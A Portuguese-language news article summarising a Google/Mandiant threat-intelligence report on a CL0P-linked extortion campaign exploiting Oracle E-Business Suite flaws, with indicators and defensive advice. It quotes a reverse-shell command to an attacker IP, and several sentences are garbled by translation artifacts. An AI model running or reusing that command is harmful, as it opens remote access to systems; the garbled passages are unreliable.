O Google relata que 'grandes quantidades de dados de clientes' foram exploradas em uma campanha de extorsão

O Google relatou umatracem larga escala de dados de clientes por agentes maliciosos, que, segundo a empresa, estão envolvidos em um esquema de extorsão. O Google Threat Intelligence e a Mandiant traca operação de exploração até atacantes que podem estar associados ao grupo de extorsão CL0P.

O Grupo de Inteligência de Ameaças do Google (GTIG) e a Mandiant revelaram uma extensa campanha de extorsão que explora vulnerabilidades no Oracle E-Business Suite (EBS). A campanha resultou no roubo de grandes volumes de dados de clientes. Segundo as agências, a operação começou em 29 de setembro de 2025 e envolveu um grupo que alega ter ligações com a marca de extorsão CL0P.

Google e Mandiant revelam exploração de vulnerabilidade zero-day 

Segundo o relatório do Google, os atacantes enviaram um "grande volume" de e-mails para executivos de diversas organizações, alegando violações em seus ambientes Oracle EBS e ameaçando publicar os dados roubados, a menos que um resgate fosse pago. 

Os emails, enviados de centenas de contas de terceiros comprometidas, incluíam endereços de contato, [email protected] e [email protected], previamente vinculados ao site de vazamento de dados CL0P.

A investigação conjunta do Google e da Mandiant descobriu que a atividade de exploração remonta a julho de 2025, possivelmente ligada a uma vulnerabilidade zero-day agora traccomo CVE-2025-61882. Em alguns casos, os atacantes teriam exfiltrado "uma quantidade significativa de dados" das organizações afetadas.

A Oracle afirmou que as falhas exploradas haviam sido corrigidas em julho, mas posteriormente lançou atualizações de emergência em 4 de outubro para solucionar vulnerabilidades adicionais. A Oracle orientou seus clientes a utilizarem as atualizações de segurança críticas mais recentes e enfatizou que manter todos os patches em dia é essencial para evitar comprometimentos.

A marca de extorsão CL0P está ativa desde 2020 e tem ligações históricas com o grupo de cibercriminosos FIN11. Anteriormente, ela teve como alvo sistemas de transferência de arquivos gerenciados, como MOVEit, GoAnywhere e Accellion FTA. Essas campanhas seguiram um padrão semelhante de exploração em massa de vulnerabilidades de dia zero, roubo de dados sensíveis e extorsão semanas depois. 

Na data da publicação do relatório, nenhuma nova vítima decorrente desse incidentedent aparecido no site de vazamento de dados do CL0P. 

Implantes Java complexos e de múltiplos estágios

pelo Google e pela Mandiant revela que os atacantes usaram múltiplas cadeias de exploração direcionadas a componentes do Oracle EBS, incluindo UiServlet e SyncServlet, para obter execução remota de código e implantar malware Java em vários estágios.

Em julho de 2025, houve atividade suspeita envolvendo requisições HTTP para /OA_HTML/configurator/UiServlet. Essa atividade suspeita foi observada em outra exploração que posteriormente veio à tona em um grupo do Telegram chamado “SCATTERED LAPSUS$ HUNTERS” 

A vulnerabilidade explorada vazou utilizando diversas técnicas avançadas para obter controle sobre servidores-alvo, como falsificação de requisição do lado do servidor (SSRF), bypass de autenticação e injeção de modelo XSL.

Em agosto de 2025, os atacantes começaram a usar outra ferramenta chamada SyncServlet para criar e executar modelos maliciosos dentro do banco de dados EBS. Esses modelos continham payloads XSL codificados em Base64 que carregavam malware baseado em Java diretamente na memória. 

Entre os implantesdentestavam o GOLDVEIN.JAVA, um programa de download que recuperava payloads de segundo estágio de servidores de comando controlados pelo atacante, e uma cadeia de múltiplas camadas chamada SAGE, que instalava filtros persistentes de servlet Java para exploração posterior.

Após invadir o sistema, os atacantes usaram a conta EBS “applmgr” para explorar o sistema, coletar detalhes da rede e do sistema e, em seguida, instalar mais arquivos maliciosos. Os atacantes também usaram comandos de shell como ip addr, netstat -an e bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Os endereços IP 200.107.207.26 e 161.97.99.49 foramdentem tentativas de exploração, enquanto 162.55.17.215:443 e 104.194.11.200:443 foram listados como servidores de comando e controle para o payload GOLDVEIN.JAVA.

A GTIG não vinculou formalmente a operação a nenhum grupo conhecido, mas a campanha apresenta semelhanças com a FIN11, um grupo de cibercriminosos com motivação financeira que já foi associado ao ransomware CL0P e a operações de roubo de dados em larga escala. 

A Mandiant também observou que uma das contas comprometidas usadas para enviar os e-mails de extorsão já havia sido usada em ataques anteriores relacionados ao FIN11.

Recomenda-se aos usuários que desconfiem das tabelas XDO_TEMPLATES_B e XDO_LOBS do banco de dados EBS, especialmente aquelas com nomes que começam com “TMP” ou “DEF”, e que bloqueiem o tráfego externo da internet proveniente dos servidores EBS para evitar mais extorsão de dados.

As organizações também recomendam o monitoramento rigoroso das solicitações HTTP para endpoints como /OA_HTML/SyncServlet e /OA_HTML/configurator/UiServlet, além da análise de despejos de memória em busca de evidências de payloads Java na memória.

O Google alertou que grupos ligados ao CL0P quase certamente continuarão a dedicar seus recursos à aquisição de exploits de dia zero.